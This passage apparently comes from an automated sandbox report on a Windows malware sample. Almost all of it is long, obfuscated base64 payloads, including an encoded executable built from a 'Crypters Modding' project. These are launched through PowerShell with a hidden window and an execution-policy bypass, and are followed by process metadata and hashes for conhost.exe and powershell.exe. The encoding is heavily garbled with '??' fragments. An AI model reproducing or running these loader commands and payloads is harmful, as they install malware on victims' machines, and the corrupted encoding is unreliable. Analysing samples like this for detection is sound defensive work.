0U3lzdGVtLldlYi5TZXJ2aWNlcy5Qcm90b2NvbHMuU29hcEh0dHBDbGllbnRQcm90b2NvbBJDcmVhdGVfX0luc3RhbmNlX18TRGlzcG9zZV9fSW5zdGFuY2VfXw?? ?? ?? B?? B?? ?? tNeS5Db21wdXRlcg?? ?? EwE?? Dk15LkFwcGxpY2F0aW9u?? ?? ?? M?? Q?? HTXkuVXNlcg?? ?? EwE?? Dk15LldlYlNlcnZpY2Vz?? ?? ?? Q?? Q?? LTXkuU2V0dGluZ3M?? ?? ?? C0?? ?? ?? ?? zsrvvgE?? ?? ?? CR?? ?? ?? ?? bFN5c3RlbS5SZXNvdXJjZXMuUmVzb3VyY2VSZWFkZXIsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLj?? sIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZT?? 4OSNTeXN0ZW0uUmVzb3VyY2VzLlJ1bnRpbWVSZXNvdXJjZVNld?? I?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? FBBRFBBRFC0?? ?? ?? ?? ?? ?? ?? ?? ?? H6xN+k?? ?? ?? ?? ?? ?? g?? ?? ?? Gk?? ?? ?? BEOQ?? ?? RBs?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? BSU0RTz7YbjMR2n0y4xJgHLeBcd?? E?? ?? ?? BEOlxIYWNraW5nXENyeXB0ZXJzIE1vZGRpbmdcQ2xhc3NMaWJyYXJ5M1xDbGFzc0xpYnJhcnkzXG9ialxSZWxlYXNlXGxwT1VwbE1wLnBkYgDVOQ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? DvOQ?? ?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 4Tk?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? BfQ29yRGxsTWFpbgBtc2NvcmVlLmRsb?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? /yU?? I?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? B?? ?? ?? ?? ?? Y?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? E?? ?? ?? ?? w?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? BI?? ?? ?? ?? WE?? ?? ?? DwD?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? DwDN?? ?? ?? ?? FY?? UwBf?? FY?? RQBS?? FM?? SQBP?? E4?? XwBJ?? E4?? RgBP?? ?? ?? ?? ?? ?? C9BO/+?? ?? ?? B?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? /?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? R?? ?? ?? ?? ?? E?? VgBh?? HI?? RgBp?? Gw?? ZQBJ?? G4?? ZgBv?? ?? ?? ?? ?? ?? ?? k?? ?? Q?? ?? ?? BU?? HI?? YQBu?? HM?? b?? Bh?? HQ?? aQBv?? G4?? ?? ?? ?? ?? ?? ?? ?? ?? s?? Sc?? g?? ?? ?? QBT?? HQ?? cgBp?? G4?? ZwBG?? Gk?? b?? Bl?? Ek?? bgBm?? G8?? ?? ?? B4?? g?? ?? ?? Q?? w?? D?? ?? M?? ?? w?? D?? ?? N?? Bi?? D?? ?? ?? ?? ?? q?? ?? k?? ?? QBD?? G8?? bQBt?? GU?? bgB0?? HM?? ?? ?? Bs?? H?? ?? TwBV?? H?? ?? b?? BN?? H?? ?? ?? ?? ?? ?? ?? DI?? CQ?? B?? EM?? bwBt?? H?? ?? YQBu?? Hk?? TgBh?? G0?? ZQ?? ?? ?? ?? ?? ?? b?? Bw?? E8?? VQBw?? Gw?? TQBw?? ?? ?? ?? ?? ?? ?? 6?? ?? k?? ?? QBG?? Gk?? b?? Bl?? EQ?? ZQBz?? GM?? cgBp?? H?? ?? d?? Bp?? G8?? bg?? ?? ?? ?? ?? ?? b?? Bw?? E8?? VQBw?? Gw?? TQBw?? ?? ?? ?? ?? ?? ?? w?? ?? g?? ?? QBG?? Gk?? b?? Bl?? FY?? ZQBy?? HM?? aQBv?? G4?? ?? ?? ?? ?? ?? DE?? Lg?? w?? C4?? M?? ?? u?? D?? ?? ?? ?? ?? 6?? ?? 0?? ?? QBJ?? G4?? d?? Bl?? HI?? bgBh?? Gw?? TgBh?? G0?? ZQ?? ?? ?? Gw?? c?? BP?? FU?? c?? Bs?? E0?? c?? ?? u?? GQ?? b?? Bs?? ?? ?? ?? ?? ?? BI?? BI?? ?? QBM?? GU?? ZwBh?? Gw?? QwBv?? H?? ?? eQBy?? Gk?? ZwBo?? HQ?? ?? ?? BD?? G8?? c?? B5?? HI?? aQBn?? Gg?? d?? ?? g?? Kk?? I?? ?? g?? DI?? M?? ?? y?? DI?? ?? ?? ?? q?? ?? E?? ?? QBM?? GU?? ZwBh?? Gw?? V?? By?? GE?? Z?? Bl?? G0?? YQBy?? Gs?? cw?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? EI?? DQ?? B?? E8?? cgBp?? Gc?? aQBu?? GE?? b?? BG?? Gk?? b?? Bl?? G4?? YQBt?? GU?? ?? ?? Bs?? H?? ?? TwBV?? H?? ?? b?? BN?? H?? ?? LgBk?? Gw?? b?? ?? ?? ?? ?? ?? ?? Mg?? J?? ?? E?? U?? By?? G8?? Z?? B1?? GM?? d?? BO?? GE?? bQBl?? ?? ?? ?? ?? ?? Bs?? H?? ?? TwBV?? H?? ?? b?? BN?? H?? ?? ?? ?? ?? ?? ?? DQ?? C?? ?? B?? F?? ?? cgBv?? GQ?? dQBj?? HQ?? VgBl?? HI?? cwBp?? G8?? bg?? ?? ?? DE?? Lg?? w?? C4?? M?? ?? u?? D?? ?? ?? ?? ?? 4?? ?? g?? ?? QBB?? HM?? cwBl?? G0?? YgBs?? Hk?? I?? BW?? GU?? cgBz?? Gk?? bwBu?? ?? ?? ?? MQ?? u?? D?? ?? Lg?? w?? C4?? M?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? w?? ?? ?? M?? ?? ?? ?? BDo?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ');powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
Imagebase:	0x7ff777fc0000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Reputation:	high

Analysis Process: conhost.exePID: 5524, Parent PID: 5608

General

Target ID:	14
Start time:	06:49:25
Start date:	21/02/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: powershell.exePID: 5876, Parent PID: 5608

General

Target ID:	16
Start time:	06:49:27
Start date:	21/02/2022
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$LHgK = 'TVqQ?? ?? M?? ?? ?? ?? E?? ?? ?? ?? //8?? ?? Lg?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? 4fug4?? t?? nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ?? ?? ?? ?? ?? ?? ?? ?? ?? BQRQ?? ?? T?? ED?? OJNIpY?? ?? ?? ?? ?? ?? ?? ?? ?? ?? O?? ?? ?? iEL?? V?? ?? ?? Bw?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? jo?? ?? ?? ?? g?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? E?? ?? g?? ?? ?? ?? ?? g?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? ?? ?? ?? M?? YIU?? ?? B?? ?? ?? B?? ?? ?? ?? ?? ?? E?? ?? ?? E?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? K05?? ?? BP?? ?? ?? ?? ?? E?? ?? ?? JgD?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? w?? ?? ?? ?? MOQ?? ?? O?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? I?? ?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? CC?? ?? ?? Eg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C50ZXh0?? ?? ?? ?? CBo?? ?? ?? ?? g?? ?? ?? ?? H?? ?? ?? ?? ?? I?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? G?? ucnNyYw?? ?? ?? JgD?? ?? ?? ?? Q?? ?? ?? ?? ?? Q?? ?? ?? ?? e?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? B?? LnJlbG9j?? ?? ?? M?? ?? ?? ?? ?? G?? ?? ?? ?? ?? C?? ?? ?? ?? Ig?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? Qg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? DhOQ?? ?? ?? ?? ?? ?? ?? Eg?? ?? ?? ?? C?? ?? U?? nCI?? ?? LgV?? ?? ?? D?? ?? ?? ?? ?? ?? ?? ?? ?? FQ4?? ?? C4?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B4CKBc?? ?? ?? oqHgIoG?? ?? ?? Ciqmcxk?? ?? ?? q?? ?? Q?? ?? BHMa?? ?? ?? Kg?? I?? ?? ?? RzGw?? ?? Co?? D?? ?? ?? Ecxw?? ?? ?? q?? B?? ?? ?? BCoufgE?? ?? ?? RvHQ?? ?? CioufgI?? ?? ?? RvHg?? ?? CioufgM?? ?? ?? RvHw?? ?? CioufgQ?? ?? ?? RvI?? ?? ?? CirGfgU?? ?? ?? QUKCE?? ?? ?? osHnIB?? ?? Bw0?? U?? ?? ?? IoIg?? ?? Cm8j?? ?? ?? KcyQ?? ?? ?? q?? BQ?? ?? BH4F?? ?? ?? EKhp+Bg?? ?? BCoe?? o?? G?? ?? ?? EKlZzD?? ?? ?? Bigl?? ?? ?? Kd?? Y?? ?? ?? K?? Bw?? ?? BCoe?? igm?? ?? ?? KKhp+Bw?? ?? BCoaK?? 0?? ?? ?? YqHgIoJw?? ?? Cio?? Ez?? H?? Lc?? ?? ?? ?? B?? ?? ?? Rcic?? ?? H?? Kcyg?? ?? ?? olKCk?? ?? ?? pvKg?? ?? CgYoKw?? ?? Cm8s?? ?? ?? KCwcoKw?? ?? CgsHcn8?? ?? HByhQ?? ?? cG8t?? ?? ?? KC3Mo?? ?? ?? K?? igr?? ?? ?? KKCw?? ?? ?? oMCCgr?? ?? ?? KDHKJ?? ?? BwKCs?? ?? ?? oNCXLP?? ?? BwKCs?? ?? ?? ooLg?? ?? Cg0oLw?? ?? CgcoM?? ?? ?? Cm8x?? ?? ?? Kcuc?? ?? HBvMg?? ?? CnIL?? QBwbzM?? ?? ?? oUGI0X?? ?? ?? BJRYJch0B?? H?? oLg?? ?? CqIlFwgoM?? ?? ?? CqJvN?? ?? ?? CiYqNgIDKDU?? ?? ?? ooNg?? ?? Cioe?? ig3?? ?? ?? KKi7QCQ?? ?? ?? igi?? ?? ?? KKh4CKDg?? ?? ?? oq?? ?? ?? ?? Ez?? B?? BQ?? ?? ?? ?? C?? ?? ?? R?? owF?? ?? ?? bLQgo?? Q?? ?? Kwor?? gIKBioi?? /4VBQ?? ?? Gyoe?? ign?? ?? ?? KKg?? ?? ?? BMw?? g?? o?? ?? ?? ?? ?? w?? ?? EQJ7Og?? ?? Cm87?? ?? ?? KCgaMC?? ?? ?? Gy0SK?? I?? ?? CsK?? ns6?? ?? ?? KBm88?? ?? ?? KBipK?? ign?? ?? ?? K?? nM9?? ?? ?? KfTo?? ?? ?? oq?? EJTSkIB?? ?? E?? ?? ?? ?? ?? ?? ?? w?? ?? ?? B2NC4wLjMwMzE5?? ?? ?? ?? ?? ?? U?? b?? ?? ?? ?? MwH?? ?? ?? jfg?? ?? O?? g?? ?? BQI?? ?? ?? jU3RyaW5ncw?? ?? ?? ?? BME?? ?? ?? O?? E?? ?? CNVUwCEEQ?? ?? E?? ?? ?? ?? CNHVUlE?? ?? ?? ?? lBE?? ?? CQE?? ?? ?? jQmxvYg?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? BVxWiCQkP?? ?? ?? ?? +gEz?? BY?? ?? ?? E?? ?? ?? ?? u?? ?? ?? ?? Cg?? ?? ?? ?? g?? ?? ?? ?? Z?? ?? ?? ?? BQ?? ?? ?? D0?? ?? ?? B?? ?? ?? ?? ?? ?? w?? ?? ?? ?? U?? ?? ?? ?? J?? ?? ?? ?? Cg?? ?? ?? ?? g?? ?? ?? ?? B?? ?? ?? ?? ?? w?? ?? ?? ?? E?? ?? ?? ?? C?? ?? ?? ?? ?? w?? ?? ?? ?? I?? ?? ?? ?? ?? ?? IkE?? Q?? ?? ?? ?? ?? ?? BgBC?? 98GBgCv?? 98GBg?? Z?? i?? GDwBDBw?? ?? BgBa?? ioFBg?? l?? yoFBgCW?? yoFBgBi?? yoFBgB7?? yoFBgCh?? ioFBgBG?? pkGBgDC?? ZkGBgDt?? ioFBgC8?? gYECgDl?? d?? FCgCS?? XMECg?? t?? nMEDgBf?? W8GDg?? ?? BjMGBgDV?? i?? GDgBx?? rgGDgCJ?? ns?? BgCYB5YEDgDsBW8GDg?? K?? 3s?? Bg?? n?? ZYEDg?? B?? EkECgDQ?? akEBgD8?? S?? GBgCn?? d8GBgD?? Bf8GBgBHBRUFCgBv?? Q?? FBg?? ?? ?? ZYEBgD4ByoFCgB6?? Q?? FCgD?? B6kHBgD9?? 9IHDgBSB3s?? BgBCBJYEBgDGBJYEBgDKB5YEBg?? 8BSoFBgBU?? SoFBgCCB98GBg?? JBpYE?? ?? ?? ?? ?? Dc?? ?? ?? ?? ?? ?? ?? E?? ?? Q?? ?? ?? ?? ?? ?? 8gToB0k?? ?? Q?? B?? ?? ?? ?? ?? ?? D+BegHTQ?? B?? ?? I?? ?? ?? EQ?? J8H6?? dd?? ?? E?? ?? w?? ?? ?? Q?? ?? H?? cQB10?? BQ?? I?? ?? ?? BE?? BnB+gHhQ?? H?? ?? s?? ?? ?? E?? ?? ?? EI6?? dd?? ?? g?? Dg?? B?? ?? ?? ?? 8?? NTBV0?? C?? ?? P?? ?? UB?? ?? BhBg?? ?? XQ?? I?? BE?? BQE?? ?? B?? ?? ?? ?? Bd?? ?? g?? G?? ?? x?? IUFJgEx?? FwFLgEx?? H?? FNgEx?? J4FPgER?? J0ERgER?? EQBSgER?? NQ?? TwEh?? N4H9wBQI?? ?? ?? ?? ?? ?? GGBMGBg?? B?? Fgg?? ?? ?? ?? ?? ?? YYEwYG?? ?? E?? YC?? ?? ?? ?? ?? ?? ERgZBlMB?? QCKI?? ?? ?? ?? ?? ?? TCPEFVwEB?? JYg?? ?? ?? ?? ?? BMI4gRc?? QE?? oi?? ?? ?? ?? ?? ?? EwjoBWEB?? QCuI?? ?? ?? ?? ?? ?? TCFEGZgEB?? Log?? ?? ?? ?? ?? BMIv?? Vr?? QE?? 7C?? ?? ?? ?? ?? ?? Ewgs?? X?? B?? QDzI?? ?? ?? ?? ?? ?? TCDgBdgEB?? Psg?? ?? ?? ?? ?? BEYGQZT?? QI?? ESE?? ?? ?? ?? ?? BhgTBgY?? ?? g?? ZIQ?? ?? ?? ?? ?? WCLQHfQEC?? C?? h?? ?? ?? ?? ?? BMIWgd9?? QI?? JyE?? ?? ?? ?? ?? BhgTBgY?? ?? g?? wIQ?? ?? ?? ?? ?? W?? Gk?? ggEC?? PMh?? ?? ?? ?? ?? MYCewfL?? ?? M?? ?? SI?? ?? ?? ?? ?? xgLt?? N?? ?? B?? ?? JIg?? ?? ?? ?? CD?? CQBhwEE?? BUi?? ?? ?? ?? ?? MYCQ?? TU?? ?? Q?? ICI?? ?? ?? ?? ?? EQBW?? IwBB?? B?? Ig?? ?? ?? ?? ?? B?? EI?? l?? EF?? Eki?? ?? ?? ?? ?? ?? YYEwYG?? ?? Y?? VCI?? ?? ?? ?? ?? ?? wjE?? Eo?? BgCIIg?? ?? ?? ?? ?? GGBMGBg?? G?? ?? ?? ?? ?? QDq?? w?? ?? ?? Q?? r?? ?? ?? ?? ?? QBRBQ?? ?? ?? QDk?? ?? ?? ?? ?? QDk?? ?? k?? EwYB?? BE?? EwYG?? Bk?? EwYK?? Ck?? EwYQ?? DE?? EwYQ?? Dk?? EwYQ?? EE?? EwYQ?? Ek?? EwYQ?? FE?? EwYQ?? Fk?? EwYV?? GE?? EwYQ?? Gk?? EwYQ?? HE?? EwYQ?? Hk?? EwYa?? Ik?? EwYg?? KE?? EwYG?? Kk?? EwYG?? LE?? EwYG?? Mk?? EwYm?? OE?? EwYQ?? Ok?? EwYG?? PE?? EwYG?? JE?? EwYG?? Jk?? EwYG?? ?? w?? EwYG?? BQ?? EwYG?? Bw?? EwYG?? CQ?? EwYG?? ?? w?? x?? BK?? BQ?? x?? BK?? Bw?? x?? BK?? CQ?? x?? BK?? Lk?? cgdP?? NE?? EgFV?? NE?? 9?? dd?? Pk?? EwZj?? CEBlgBr?? ?? kBEwYG?? Lk?? EwYG?? CkBEwYG?? DEBLgB7?? CkB+QOB?? DkBhwGI?? CkBMQSN?? EEBrQCS?? EEBkQeY?? EkB0?? Se?? FEBI?? Sk?? EkBkQCq?? BkBJ?? Gy?? NE?? owC4?? GEB+QC/?? GkB4QPG?? Lk?? ewfL?? Lk?? 7QDQ?? Lk?? Q?? TU?? HEBtQDg?? DQ?? 3gf3?? Dw?? zQNK?? Dw?? 1wMO?? Tw?? EwYG?? Ck?? owDM?? y4?? CwDF?? S4?? EwDO?? S4?? GwDt?? S4?? IwD2?? S4?? KwD2?? S4?? MwD2?? S4?? OwD2?? S4?? Qw?? E?? i4?? Sw?? c?? i4?? Uw?? c?? i4?? Ww?? i?? i4?? YwBM?? i4?? awBZ?? k?? ?? gwCn?? k?? ?? ewCs?? kM?? cwC1?? kM?? ewCs?? kk?? owDd?? 2M?? cwC1?? mM?? ewCs?? mk?? owDx?? 4?? ?? gwCn?? oM?? iwCn?? oM?? kwCn?? oM?? cwC1?? ok?? owD+?? 6?? ?? gwCn?? qM?? iwCn?? qM?? cwDO?? qM?? qwCn?? qM?? swCn?? qM?? kwCn?? qk?? ewDt?? c?? ?? gwCn?? sM?? swCn?? sM?? cw?? Q?? 8M?? ewDt?? ck?? ewDt?? e?? ?? gwCn?? uM?? iwCn?? uM?? kwCn?? uM?? qwCn?? 